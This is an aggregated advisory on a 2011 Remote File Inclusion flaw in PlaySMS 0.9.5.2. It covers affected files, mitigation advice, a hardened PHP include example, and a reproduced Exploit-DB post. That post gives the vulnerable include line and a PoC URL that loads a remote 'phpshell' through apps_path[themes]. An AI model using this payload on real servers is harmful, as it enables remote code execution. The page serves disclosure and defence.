Vendor: PlaySMS
By: NoGe
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: PlaySMS
Affected Version From: 0.9.5.2
Affected Version To: 0.9.5.2
Patch Exists: YES
Related CWE: N/A
CPE: a:playsms:playsms:0.9.5.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

PlaySMS <= Remote File Inclusion Vulnerability

PlaySMS version 0.9.5.2 is vulnerable to Remote File Inclusion (RFI). The vulnerability affects all of the following files: web/plugin/themes/default/page_forgot.php, web/plugin/themes/default/page_login.php, web/plugin/themes/default/page_noaccess.php, web/plugin/themes/default/page_register.php, web/plugin/themes/km2/page_noaccess.php, web/plugin/themes/work2/page_forgot.php, web/plugin/themes/work2/page_login.php, web/plugin/themes/work2/page_noaccess.php and web/plugin/themes/work2/page_register.php. An attacker can exploit this vulnerability by sending a malicious URL to the victim. The malicious URL carries the RFI payload in the apps_path[themes] parameter, which can be used to execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before it is used in the application, in particular before it reaches an include statement. The application should also be configured according to the principle of least privilege.
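
One way to apply that validation to the include line quoted in the raw advisory below, as an added example (not PlaySMS code and not part of the advisory). The helper name theme_header_path() and the temporary demo directory are hypothetical and constructed for illustration; the themes root is assumed to come from server-side configuration.

```php
<?php
// Added example, not PlaySMS code. Hardened counterpart of the advisory's
//   include $apps_path['themes']."/".$themes_module."/header.php";
// theme_header_path() is a hypothetical helper. How a request value reaches
// $apps_path is not stated on the page; the fix does not depend on it.

/**
 * Return the real path of <root>/<module>/header.php, or null when the module
 * name is not a plain directory name or the file resolves outside <root>.
 * $root must come from server-side configuration, never from the request.
 */
function theme_header_path(string $root, string $module): ?string
{
    // Shape allowlist: a single path segment, so no scheme, slash or dot.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $module)) {
        return null;
    }
    $rootReal = realpath($root);
    $file     = realpath($root . '/' . $module . '/header.php');
    if ($rootReal === false || $file === false) {
        return null; // themes root or theme header does not exist
    }
    // Containment check after symlinks and ".." have been resolved.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Constructed demo: a throwaway themes tree and four candidate module names.
$root = sys_get_temp_dir() . '/themes_demo_' . getmypid();
mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/header.php', "<?php echo \"header ok\\n\";");

foreach (['default', '../default', 'http://example.invalid/x?', 'missing'] as $m) {
    $path = theme_header_path($root, $m);
    if ($path === null) {
        echo "rejected: $m\n";
    } else {
        include $path; // only a verified local file is ever included
    }
}

// Remove the demo tree.
unlink($root . '/default/header.php');
rmdir($root . '/default');
rmdir($root);
```

Keeping allow_url_include set to Off in php.ini (its default since PHP 5.2) blocks URL-based includes as a second layer behind this check.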

Exploit-DB raw data:

=============================================================================================================
 
  [o] PlaySMS <= Remote File Inclusion Vulnerability
  
       Software : PlaySMS ver 0.9.5.2
       Vendor   : http://playsms.org/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/

=============================================================================================================

  [o] Vulnerability

       <?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>

       affects all of these files

       web/plugin/themes/default/page_forgot.php
       web/plugin/themes/default/page_login.php
       web/plugin/themes/default/page_noaccess.php
       web/plugin/themes/default/page_register.php
       web/plugin/themes/km2/page_noaccess.php
       web/plugin/themes/work2/page_forgot.php
       web/plugin/themes/work2/page_login.php
       web/plugin/themes/work2/page_noaccess.php
       web/plugin/themes/work2/page_register.php


  [o] Exploit

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


  [o] PoC

       http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

=============================================================================================================

  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

  [o] September 05 2011 - Papua, Indonesia